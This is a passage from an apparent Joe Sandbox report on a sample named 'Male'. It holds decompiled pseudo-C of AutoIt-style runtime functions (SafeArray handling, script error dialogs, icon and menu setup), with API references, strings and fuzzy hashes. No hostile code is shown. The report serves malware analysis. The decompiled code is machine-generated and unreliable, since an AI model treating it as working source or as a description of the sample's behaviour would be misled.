						goto L13;
					}
					__imp__#8( &_v48);
					_t58 =  &_v12;
					_v40 = _t87;
					_v36 = _t87;
					_v32 = _t87;
					_v24 = _t87;
					_v20 = 1;
					__imp__#23(_a4, _t58);
					if(_t58 < 0) {
						__imp__#39(_a4);
						__imp__#38(_a4);
						E013BD720( &_v32);
						__imp__#9( &_v48);
						goto L13;
					}
					_t73 = _v12;
					E013BC852(_t73,  &_v32, _t88);
					asm("sbb esi, esi");
					_t93 =  !( ~(_v20 - 5)) & _v32;
					E0140FDED(_t93, 2);
					_t63 =  *_t93;
					_t94 =  *((intOrPtr*)(_t63 + 8));
					_t79 =  *((intOrPtr*)(_t63 + 4));
					_v16 = _t79;
					if(_t94 <= 0) {
						L10:
						__imp__#24(_a4);
						E013BD720( &_v32);
						__imp__#9( &_v48);
						return _a4;
					} else {
						goto L7;
					}
					do {
						L7:
						if( *((intOrPtr*)(_t79 + _t87 * 4)) != 0) {
							E0141026A( &_v48,  *((intOrPtr*)(_t79 + _t87 * 4)));
							__imp__#10(_t73,  &_v48);
							_t79 = _v16;
						}
						_t87 = _t87 + 1;
						_t73 = _t73 + 0x10;
					} while (_t87 < _t94);
					goto L10;
				} else {
					goto L3;
				}
				do {
					L3:
					_t86 = _t74;
					_v12 = _t74 + 1;
					 *((intOrPtr*)(_a4 + 0x14 + _t86 * 8)) = 0;
					 *((intOrPtr*)(_a4 + 0x10 + _t86 * 8)) = E013CF38E(E0142271B(_t88), _t74 + 1);
					_t74 = _v12;
				} while (_t74 < _t72);
				goto L4;
			}

0x014102af
0x014102b7
0x0141040e
0x00000000
0x0141040e
0x014102c1
0x014102c7
0x014102ce
0x014102d6
0x00000000
0x00000000
0x014102dc
0x014102de
0x014102e2
0x0141030e
0x01410316
0x0141031a
0x0141031d
0x01410327
0x0141032f
0x01410408
0x00000000
0x01410408
0x01410339
0x0141033f
0x01410342
0x01410349
0x0141034c
0x0141034f
0x01410352
0x01410359
0x01410361
0x014103e2
0x014103eb
0x014103f4
0x014103fd
0x00000000
0x014103fd
0x01410363
0x0141036a
0x01410379
0x0141037d
0x01410382
0x01410387
0x01410389
0x0141038c
0x0141038f
0x01410394
0x014103bd
0x014103c0
0x014103cc
0x014103d5
0x00000000
0x00000000
0x00000000
0x00000000
0x01410396
0x01410396
0x0141039a
0x014103a2
0x014103ac
0x014103b2
0x014103b2
0x014103b5
0x014103b6
0x014103b9
0x00000000
0x00000000
0x00000000
0x00000000
0x014102e4
0x014102e4
0x014102e7
0x014102eb
0x014102f0
0x01410303
0x01410307
0x0141030a
0x00000000

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 014102CE
SafeArrayAllocData.OLEAUT32(?), ref: 01410327
VariantInit.OLEAUT32(?), ref: 01410339
SafeArrayAccessData.OLEAUT32(?,?), ref: 01410359
VariantCopy.OLEAUT32(?,?), ref: 014103AC
SafeArrayUnaccessData.OLEAUT32(?), ref: 014103C0
VariantClear.OLEAUT32(?), ref: 014103D5
SafeArrayDestroyData.OLEAUT32(?), ref: 014103E2
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 014103EB
VariantClear.OLEAUT32(?), ref: 014103FD
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01410408

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 1e6645d2a8f9f8a2f0d1805ec37a9ecfe37329881f5b00400b3c6f0f656c4da9
Instruction ID: 412e20e04ad8aa92be948041b2077d3245644a51ae6782f3867567d7b29918e2
Opcode Fuzzy Hash: 1e6645d2a8f9f8a2f0d1805ec37a9ecfe37329881f5b00400b3c6f0f656c4da9
Instruction Fuzzy Hash: 04415035E002199FCB10DFA9C8849EEBBB9EF58354F008029F915A7265DB34A985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01423C9F, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01423C9F(void* __ecx, void* __fp0) {
				intOrPtr _v8;
				WCHAR* _v24;
				char _v40;
				intOrPtr _v52;
				char _v56;
				char _v72;
				WCHAR* _v88;
				short _v8284;
				void* _t49;
				void* _t60;
				void* _t63;
				void* _t95;
				void* _t117;
				intOrPtr _t123;
				void* _t136;

				_t136 = __fp0;
				_t49 = 0x205c;
				E013F2370();
				_t117 = __ecx;
				if( *0x1482350 == 0) {
					_t129 =  *((intOrPtr*)(__ecx + 0xf8)) - 1;
					if( *((intOrPtr*)(__ecx + 0xf8)) != 1) {
						LoadStringW( *0x1482348, 0x66,  &_v8284, 0xfff);
						E013BC110( &_v88, _t129,  &_v8284);
						LoadStringW( *0x1482348, 0x72,  &_v8284, 0xfff);
						E013BC110( &_v72, _t129,  &_v8284);
						_t115 =  *((intOrPtr*)(_t117 + 0xf4));
						_t95 = E013BBE8E( *((intOrPtr*)(_t117 + 0xf4)));
						_v8 = E0141A179( *((intOrPtr*)(_t117 + 0xf4)));
						_t60 = E0141A1EF(_t115);
						E013B9091( &_v56, _t129);
						_t63 = E0141A223(_t60,  &_v56);
						_t130 = _t63;
						if(_t63 == 0) {
							_push( *((intOrPtr*)(_t117 + 0xc8)));
							E013CFEFB( &_v56, _t115,  &_v8284, L"Line %d  (File \"%s\"):\n\n",  *((intOrPtr*)(_t117 + 0xf4)));
							_t123 = _v8;
						} else {
							_push(_v56);
							_t123 = _v8;
							E013CFEFB( &_v56, _t115,  &_v8284, L"Line %d  (File \"%s\"):\n\n", _t123);
						}
						E013BC110( &_v24, _t130,  &_v8284);
						_t131 = _t95;
						if(_t95 != 0) {
							E013B4DCB( &_v24, _t136, _t95);
							E013B4DCB( &_v24, _t136, "\n");
						}
						E013B9091( &_v40, _t131);
						E013BB0DB( &_v40, L"^ ERROR ");
						E013B4DCB( &_v40, _t136, L"Incorrect parameters to object property !");
						E013B4D30( &_v24, _t136,  &_v40);
						E013B4DCB( &_v24, _t136, "\n");
						E013B4DCB( &_v24, _t136, L"\nError: ");
						E013B4D30( &_v24, _t136,  &_v72);
						if( *0x1482354 == 0) {
							MessageBoxW( *0x148237c, _v24, _v88, 0x11010);
						} else {
							if(_v52 == 0) {
								_push(_v72);
								_push( *((intOrPtr*)(_t117 + 0xf4)));
								E0141A3F3(L"\"%s\" (%d) : ==> %s:\n",  *((intOrPtr*)(_t117 + 0xc8)));
							} else {
								_push(_v40);
								_push(_t95);
								_push(_v72);
								_push(_t123);
								E0141A3F3(L"\"%s\" (%d) : ==> %s:\n%s\n%s\n", _v56);
							}
						}
						 *((intOrPtr*)(_t117 + 0xf8)) = 1;
						 *0x148234c = ((0 |  *((intOrPtr*)(_t117 + 0x11c)) != 0x00000000) - 0x00000001 & 0x80000f8f) + 0x7ffff072;
						E013B774C( &_v40);
						E013B774C( &_v24);
						E013B774C( &_v56);
						E013B774C( &_v72);
						_t49 = E013B774C( &_v88);
					}
				}
				return _t49;
			}

0x01423c9f
0x01423ca2
0x01423ca7
0x01423cb6
0x01423cb8
0x01423cbe
0x01423cc5
0x01423ce6
0x01423cf2
0x01423d07
0x01423d13
0x01423d18
0x01423d25
0x01423d2d
0x01423d30
0x01423d3a
0x01423d44
0x01423d49
0x01423d51
0x01423d67
0x01423d79
0x01423d7e
0x01423d53
0x01423d53
0x01423d56
0x01423d60
0x01423d60
0x01423d8e
0x01423d93
0x01423d95
0x01423d9b
0x01423da8
0x01423da8
0x01423db0
0x01423dbd
0x01423dca
0x01423dd6
0x01423de3
0x01423df0
0x01423dfc
0x01423e08
0x01423e59
0x01423e0a
0x01423e0e
0x01423e2a
0x01423e2d
0x01423e3e
0x01423e10
0x01423e10
0x01423e13
0x01423e14
0x01423e17
0x01423e20
0x01423e25
0x01423e0e
0x01423e61
0x01423e82
0x01423e87
0x01423e8f
0x01423e97
0x01423e9f
0x01423ea7
0x01423ea7
0x01423cc5
0x01423eb0

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 01423CE6

Part of subcall function 013BC110: _wcslen.LIBCMT ref: 013BC11A

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 01423D07

Strings

"%s" (%d) : ==> %s:, xrefs: 01423E39
Incorrect parameters to object property !, xrefs: 01423DC2
^ ERROR , xrefs: 01423DB5
Line %d (File "%s"):, xrefs: 01423D5A, 01423D73
"%s" (%d) : ==> %s:%s%s, xrefs: 01423E1B
Error: , xrefs: 01423DE8

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: d444581d4e41276c58da077eeeb82f53680b05a421d7424936533aec5bf125b9
Instruction ID: b5b2c748968a408e97567e31709287c93e61887d8c58fc27000fafe52712c3b4
Opcode Fuzzy Hash: d444581d4e41276c58da077eeeb82f53680b05a421d7424936533aec5bf125b9
Instruction Fuzzy Hash: B751E77190021AAADF14EBE4DD85EEEB778FF24204F60016AE605720B1EB746F89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01423EB3, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01423EB3(void* __ecx, void* __fp0, int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				WCHAR* _v24;
				intOrPtr _v28;
				char _v44;
				intOrPtr _v56;
				char _v60;
				char _v76;
				WCHAR* _v92;
				short _v8284;
				void* _t54;
				void* _t65;
				void* _t68;
				WCHAR* _t69;
				intOrPtr _t95;
				void* _t119;
				intOrPtr _t125;
				void* _t139;

				_t139 = __fp0;
				_t54 = 0x205c;
				E013F2370();
				_t119 = __ecx;
				if( *0x1482350 == 0) {
					_t95 = 1;
					_t131 =  *((intOrPtr*)(__ecx + 0xf8)) - 1;
					if( *((intOrPtr*)(__ecx + 0xf8)) != 1) {
						LoadStringW( *0x1482348, 0x66,  &_v8284, 0xfff);
						E013BC110( &_v92, _t131,  &_v8284);
						LoadStringW( *0x1482348, _a4,  &_v8284, 0xfff);
						E013BC110( &_v76, _t131,  &_v8284);
						_t117 =  *((intOrPtr*)(_t119 + 0xf4));
						_v28 = E013BBE8E( *((intOrPtr*)(_t119 + 0xf4)));
						_v8 = E0141A179( *((intOrPtr*)(_t119 + 0xf4)));
						_t65 = E0141A1EF(_t117);
						_t100 =  &_v60;
						E013B9091( &_v60, _t131);
						_t68 = E0141A223(_t65,  &_v60);
						_t132 = _t68;
						_t69 =  &_v8284;
						if(_t68 == 0) {
							_push( *((intOrPtr*)(_t119 + 0xc8)));
							_push( *((intOrPtr*)(_t119 + 0xf4)));
						} else {
							_push(_v60);
							_push(_v8);
						}
						_push(L"Line %d  (File \"%s\"):\n\n");
						_push(_t69);
						E013CFEFB(_t100, _t117);
						E013BC110( &_v24, _t132,  &_v8284);
						_t125 = _v28;
						_t133 = _t125;
						if(_t125 != 0) {
							E013B4DCB( &_v24, _t139, _t125);
							E013B4DCB( &_v24, _t139, "\n");
						}
						E013B9091( &_v44, _t133);
						if(_a8 >= 0) {
							E013B99C5(E013BB0DB( &_v44, _t125),  &_v44, _a8, 0xffffffff);
							E013B4DCB( &_v44, _t139, L"^ ERROR");
							E013B4D30( &_v24, _t139,  &_v44);
							E013B4DCB( &_v24, _t139, "\n");
						}
						E013B4DCB( &_v24, _t139, L"\nError: ");
						E013B4D30( &_v24, _t139,  &_v76);
						if( *0x1482354 == 0) {
							MessageBoxW( *0x148237c, _v24, _v92, 0x11010);
						} else {
							if(_v56 == 0) {
								_push(_v76);
								_push( *((intOrPtr*)(_t119 + 0xf4)));
								E0141A3F3(L"\"%s\" (%d) : ==> %s:\n",  *((intOrPtr*)(_t119 + 0xc8)));
							} else {
								_push(_v44);
								_push(_t125);
								_push(_v76);
								_push(_v8);
								E0141A3F3(L"\"%s\" (%d) : ==> %s:\n%s\n%s\n", _v60);
							}
						}
						 *((intOrPtr*)(_t119 + 0xf8)) = _t95;
						if( *((char*)(_t119 + 0x11c)) != 0) {
							_t95 = _a4 + 0x7ffff000;
						}
						 *0x148234c = _t95;
						E013B774C( &_v44);
						E013B774C( &_v24);
						E013B774C( &_v60);
						E013B774C( &_v76);
						_t54 = E013B774C( &_v92);
					}
				}
				return _t54;
			}

0x01423eb3
0x01423eb6
0x01423ebb
0x01423eca
0x01423ecc
0x01423ed4
0x01423ed5
0x01423edb
0x01423efb
0x01423f07
0x01423f21
0x01423f2d
0x01423f32
0x01423f3f
0x01423f48
0x01423f4b
0x01423f50
0x01423f55
0x01423f5f
0x01423f64
0x01423f66
0x01423f6c
0x01423f76
0x01423f7c
0x01423f6e
0x01423f6e
0x01423f71
0x01423f71
0x01423f82
0x01423f87
0x01423f88
0x01423f9a
0x01423f9f
0x01423fa2
0x01423fa4
0x01423faa
0x01423fb7
0x01423fb7
0x01423fbf
0x01423fc8
0x01423fdb
0x01423fe8
0x01423ff4
0x01424001
0x01424001
0x0142400e
0x0142401a
0x01424026
0x01424079
0x01424028
0x0142402c
0x0142404a
0x0142404d
0x0142405e
0x0142402e
0x0142402e
0x01424031
0x01424032
0x01424035
0x01424040
0x01424045
0x0142402c
0x01424086
0x0142408c
0x01424091
0x01424091
0x0142409a
0x014240a0
0x014240a8
0x014240b0
0x014240b8
0x014240c0
0x014240c0
0x01423edb
0x014240c9

APIs

LoadStringW.USER32(00000066,?,00000FFF,0144DC04), ref: 01423EFB

Part of subcall function 013BC110: _wcslen.LIBCMT ref: 013BC11A

LoadStringW.USER32(?,?,00000FFF,?), ref: 01423F21

Strings

"%s" (%d) : ==> %s:, xrefs: 01424059
Line %d (File "%s"):, xrefs: 01423F82
^ ERROR, xrefs: 01423FE0
"%s" (%d) : ==> %s:%s%s, xrefs: 0142403B
Error: , xrefs: 01424006

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 8d8bb779cce34a141200a7c5b7389839b261a4b6bc90624db90b3ce5f2b219e9
Instruction ID: 58abd12e31b462d7c82ab0cceb7f3b420ede1014fd330fcc4163e90c037b7c31
Opcode Fuzzy Hash: 8d8bb779cce34a141200a7c5b7389839b261a4b6bc90624db90b3ce5f2b219e9
Instruction Fuzzy Hash: 9D51D47180011AAACF14EBE4DC85EEEBB38EF24304F54412AE605720B5EB706AC9CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0141A072, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0141A072(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				WCHAR* _v20;
				WCHAR* _v36;
				short _v8228;
				intOrPtr* _t33;
				void* _t57;
				void* _t59;
				void* _t65;
				void* _t67;

				_t67 = __fp0;
				_t65 = __eflags;
				_t57 = __edx;
				E013F2370();
				_t59 = __ecx;
				LoadStringW(GetModuleHandleW(0),  *(__ecx + 0x60),  &_v8228, 0xfff);
				E013BC110( &_v36, _t65,  &_v8228);
				_t33 = _a4;
				if( *((char*)(_t59 + 2)) == 0) {
					__eflags =  *((intOrPtr*)(_t33 + 4));
					if( *((intOrPtr*)(_t33 + 4)) != 0) {
						_push( *_t33);
						E013CFEFB( &_v36, _t57,  &_v8228, L"Line %d  (File \"%s\"):\n\n", _a8);
					} else {
						E013CFEFB( &_v36, _t57,  &_v8228, L"Line %d:\n\n", _a8);
					}
					E013BC110( &_v20, __eflags,  &_v8228);
					E013B4DCB( &_v20, _t67, _a16);
					E013B4DCB( &_v20, _t67, L"\n\nError: ");
					E013B4DCB( &_v20, _t67, _a12);
					E013B4DCB( &_v20, _t67, L".\n\n");
					MessageBoxW(0, _v20, _v36, 0x11010);
					E013B774C( &_v20);
				} else {
					_push(0x144dbf4);
					_push(_a16);
					_push(_a12);
					_push(_a8);
					E0141A3F3(L"%s (%d) : ==> %s.: \n%s \n%s\n",  *_t33);
				}
				return E013B774C( &_v36);
			}

0x0141a072
0x0141a072
0x0141a072
0x0141a07a
0x0141a085
0x0141a09a
0x0141a0aa
0x0141a0b3
0x0141a0b6
0x0141a0da
0x0141a0de
0x0141a0f9
0x0141a10a
0x0141a0e0
0x0141a0ef
0x0141a0f4
0x0141a11c
0x0141a127
0x0141a134
0x0141a13f
0x0141a14c
0x0141a15e
0x0141a167
0x0141a0b8
0x0141a0b8
0x0141a0bd
0x0141a0c0
0x0141a0c3
0x0141a0cd
0x0141a0d2
0x0141a176

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,013F3B35,?,?,Bad directive syntax error,0144DBF4,00000000,00000010,?,?), ref: 0141A093
LoadStringW.USER32(00000000,?,013F3B35,?), ref: 0141A09A

Part of subcall function 013BC110: _wcslen.LIBCMT ref: 013BC11A

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0141A15E

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 0141A0C8
Error: , xrefs: 0141A12C
Line %d:, xrefs: 0141A0E9
., xrefs: 0141A144
Line %d (File "%s"):, xrefs: 0141A104

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 925ff7ed4fc8de16273a18bf140ada230a62272dfa308f236b0bfd5755afb438
Instruction ID: 7ddfd243a62457ee287af9b436bc7fcd97c15424dac0462d9f28dc7802376068
Opcode Fuzzy Hash: 925ff7ed4fc8de16273a18bf140ada230a62272dfa308f236b0bfd5755afb438
Instruction Fuzzy Hash: DC21607190025BABCF11AF94CC49EEE7B39BF24704F04446AF615660B2EA719558DB50

Uniqueness

Uniqueness Score: -1.00%

Function 013B15EB, Relevance: 13.7, APIs: 9, Instructions: 160
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E013B15EB(void* __ecx, void* __edi, void* __esi, int _a4, char _a8, short* _a12, int _a16, long _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				struct HWND__* _v12;
				intOrPtr _t52;
				intOrPtr _t55;
				void* _t60;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t82;
				signed int _t86;
				long _t89;
				void* _t94;
				short* _t95;
				signed int _t97;
				void* _t99;
				intOrPtr* _t100;

				_t99 = __esi;
				_t94 = __edi;
				_push(__ecx);
				_push(__ecx);
				if(_a20 != 0) {
					_t86 = E013B23E1(0x14828d0, _a20);
					 *0x148293c = _t86;
				} else {
					_t86 =  *0x148293c; // 0xffffffff
				}
				if(_t86 == 0xffffffff) {
					return 0;
				} else {
					if(_a4 != 0) {
						_t52 =  *0x1482930; // 0x0
						E013BB0DB( *((intOrPtr*)( *((intOrPtr*)(_t52 + _t86 * 4)))) + 0x28, _a4);
						_t86 =  *0x148293c; // 0xffffffff
					}
					_t55 =  *0x1482930; // 0x0
					_push(_t99);
					_push(_t94);
					_t95 = _a12;
					_t100 =  *((intOrPtr*)( *((intOrPtr*)(_t55 + _t86 * 4))));
					_v12 =  *_t100;
					_a4 = 1;
					if(_t95 != 0) {
						_t60 = LoadImageW(0, _t95, 1, 0x10, 0x10, 0x10);
						_a20 = _t60;
						if(_t60 == 0) {
							_t82 = E0141E8DF(_a16);
							_a16 = _t82;
							ExtractIconExW(_t95, _t82, 0,  &_a20, 1);
						}
						_t63 = LoadImageW(0, _t95, 1, 0, 0, 0x50);
						_v8 = _t63;
						if(_t63 == 0) {
							ExtractIconExW(_t95, E0141E8DF(_a16),  &_v8, _t63, 1);
							_t63 = _v8;
						}
						_t89 = _a20;
						if(_t89 != 0) {
							SendMessageW(_v12, 0x80, 0, _t89);
							if( *(_t100 + 0x20) != 0) {
								DestroyIcon( *(_t100 + 0x20));
							}
							 *(_t100 + 0x20) = _a20;
							_t89 = _a20;
							_t63 = _v8;
						}
						if(_t63 != 0) {
							SendMessageW(_v12, 0x80, 1, _t63);
							if( *(_t100 + 0x24) != 0) {
								DestroyIcon( *(_t100 + 0x24));
							}
							 *(_t100 + 0x24) = _v8;
							_t89 = _a20;
							_t63 = _v8;
						}
						_t97 = _a4;
						if(_t89 == 0) {
							asm("sbb eax, eax");
							_t97 = _t97 &  ~_t63;
						}
					} else {
						_t97 = 1;
					}
					if(_a8 != 0xffffffff) {
						E013BBCF5( &_a8);
						if( *((intOrPtr*)(_t100 + 0x4c)) >= 0) {
							E014475A1( &_a8,  *((intOrPtr*)(_t100 + 0x4c)));
						}
						 *((intOrPtr*)(_t100 + 0x4c)) = _a8;
						E013B1F40(_a8, 1);
					}
					_t64 = _a24;
					if(_t64 != 0xffffffff) {
						 *((intOrPtr*)(_t100 + 0x50)) = _t64;
					}
					_t65 = _a28;
					if(_t65 != 0xffffffff) {
						 *((intOrPtr*)(_t100 + 0x54)) = _t65;
					}
					if( *((char*)(_t100 + 0x38)) != 0) {
						InvalidateRect(_v12, 0, 1);
					}
					return _t97;
				}
			}

0x013b15eb
0x013b15eb
0x013b15ee
0x013b15ef
0x013b15f4
0x013f2ace
0x013f2ad0
0x013b15fa
0x013b15fa
0x013b15fa
0x013b1603
0x00000000
0x013b1605
0x013b1609
0x013f2adb
0x013f2aeb
0x013f2af0
0x013f2af0
0x013b160f
0x013b1614
0x013b1615
0x013b1616
0x013b161c
0x013b1620
0x013b1626
0x013b162b
0x013f2b05
0x013f2b0b
0x013f2b10
0x013f2b15
0x013f2b1f
0x013f2b27
0x013f2b27
0x013f2b3f
0x013f2b45
0x013f2b4a
0x013f2b5d
0x013f2b63
0x013f2b63
0x013f2b66
0x013f2b71
0x013f2b7e
0x013f2b88
0x013f2b8d
0x013f2b8d
0x013f2b92
0x013f2b95
0x013f2b98
0x013f2b98
0x013f2b9d
0x013f2baa
0x013f2bb4
0x013f2bb9
0x013f2bb9
0x013f2bbe
0x013f2bc1
0x013f2bc4
0x013f2bc4
0x013f2bc7
0x013f2bcc
0x013f2bd4
0x013f2bd6
0x013f2bd6
0x013b1631
0x013b1631
0x013b1631
0x013b1637
0x013b163c
0x013b1645
0x013f2be0
0x013f2be0
0x013b1651
0x013b1654
0x013b1654
0x013b1659
0x013b165f
0x013b167f
0x013b167f
0x013b1661
0x013b1667
0x013b1684
0x013b1684
0x013b166d
0x013f2bf1
0x013f2bf1
0x00000000
0x013b1676

APIs

LoadImageW.USER32 ref: 013F2B05
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 013F2B27
LoadImageW.USER32 ref: 013F2B3F
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 013F2B5D
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 013F2B7E
DestroyIcon.USER32(00000000,?,?,?,?,?,013B143A,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 013F2B8D
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 013F2BAA
DestroyIcon.USER32(00000000,?,?,?,?,?,013B143A,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 013F2BB9

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 462d7773d21ac3f4076cf6626e9c02626c2a06ea860892fc2272d2868ec815eb
Instruction ID: e10500b24c72d95fd39ab3c3e56979abf6b93720306328433f59b3cb2ce15032
Opcode Fuzzy Hash: 462d7773d21ac3f4076cf6626e9c02626c2a06ea860892fc2272d2868ec815eb
Instruction Fuzzy Hash: 38517D74600209EFDB21DF68D895FAA7BB9EB54768F00451CFE02976A0EB70ED50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0141C4D0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0141C4D0(struct HMENU__** __ecx, short _a4, int* _a8, signed int _a12, int _a16, intOrPtr _a20) {
				struct HMENU__** _v12;
				struct tagMENUITEMINFOW _v60;
				void* __edi;
				void* __ebp;
				int _t52;
				struct HMENU__* _t55;
				int _t56;
				short _t60;
				int _t62;
				struct HMENU__* _t65;
				int _t66;
				int _t67;
				struct HMENU__* _t69;
				signed int _t71;
				struct HMENU__** _t72;
				int* _t77;
				int _t82;
				signed int _t83;
				struct HMENU__** _t84;

				_t73 = __ecx;
				_t71 = _a12;
				_t84 = __ecx;
				if(_t71 == 0xffffffff || _t71 >= 7 && _t71 < 0x207) {
					_t83 = E0141C71B(_t73);
					if(_t83 == 0xffffffff) {
						goto L31;
					}
					_t3 = _t83 * 4; // 0x0
					_v12 =  *((intOrPtr*)(_t84 + _t3 + 0x1b4));
					_v60.cbSize = 0x30;
					E013D2760(_t83,  &(_v60.fMask), 0, 0x2c);
					if(_t71 != 0xffffffff) {
						_a12 = _a12 | 0xffffffff;
						_t52 = E0141CCEE(_t84, _t71,  &_a12);
						__eflags = _t52;
						if(_t52 == 0) {
							L30:
							E0141C66D(_t84, _t83);
							goto L31;
						}
						_t76 = _a12;
						_t72 = _v12;
						_v60.fMask = 4;
						_t17 = _t76 * 4; // 0x0
						_t55 =  *( *(_t84 + _t17 + 0x1b4));
						 *_t72 = _t55;
						_t56 = GetMenuItemInfoW(_t55, _a12, 0,  &_v60);
						__eflags = _t56;
						if(_t56 == 0) {
							goto L30;
						}
						 *_t72 = _v60.hSubMenu;
						__eflags = _v60.hSubMenu;
						if(_v60.hSubMenu == 0) {
							goto L30;
						}
						__eflags = IsMenu(_v60.hSubMenu);
						if(__eflags == 0) {
							goto L30;
						}
						goto L10;
					} else {
						_t72 = _v12;
						 *_t72 =  *_t84;
						L10:
						_t77 = _a8;
						_t72[1] = 0;
						_v60.fMask = 0x32;
						_v60.fType = 0;
						_v60.dwTypeData = _t77;
						_v60.dwItemData = _t83;
						_v60.wID = _t83;
						_t60 = _a4;
						if(_t60 == 0) {
							__eflags =  *_t77;
							if(__eflags != 0) {
								__eflags = _a20 - 1;
								if(__eflags == 0) {
									_v60.fType = 0x200;
									_t72[1] = 1;
								}
							} else {
								_v60.fType = 0x800;
							}
							_t72[1] = 0;
							L19:
							if(_t84[1] == 0 || _t84[2] == 0 || _t83 < 7) {
								L26:
								_t82 = _a16;
								goto L27;
							} else {
								_t65 =  *_t84;
								if( *_t72 != _t65) {
									goto L26;
								}
								_t66 = GetMenuItemCount(_t65);
								_t82 = _a16;
								_t67 = _t66 - 4;
								if(_t82 == 0xffffffff || _t82 + 1 > _t67) {
									_t82 = _t67;
								}
								L27:
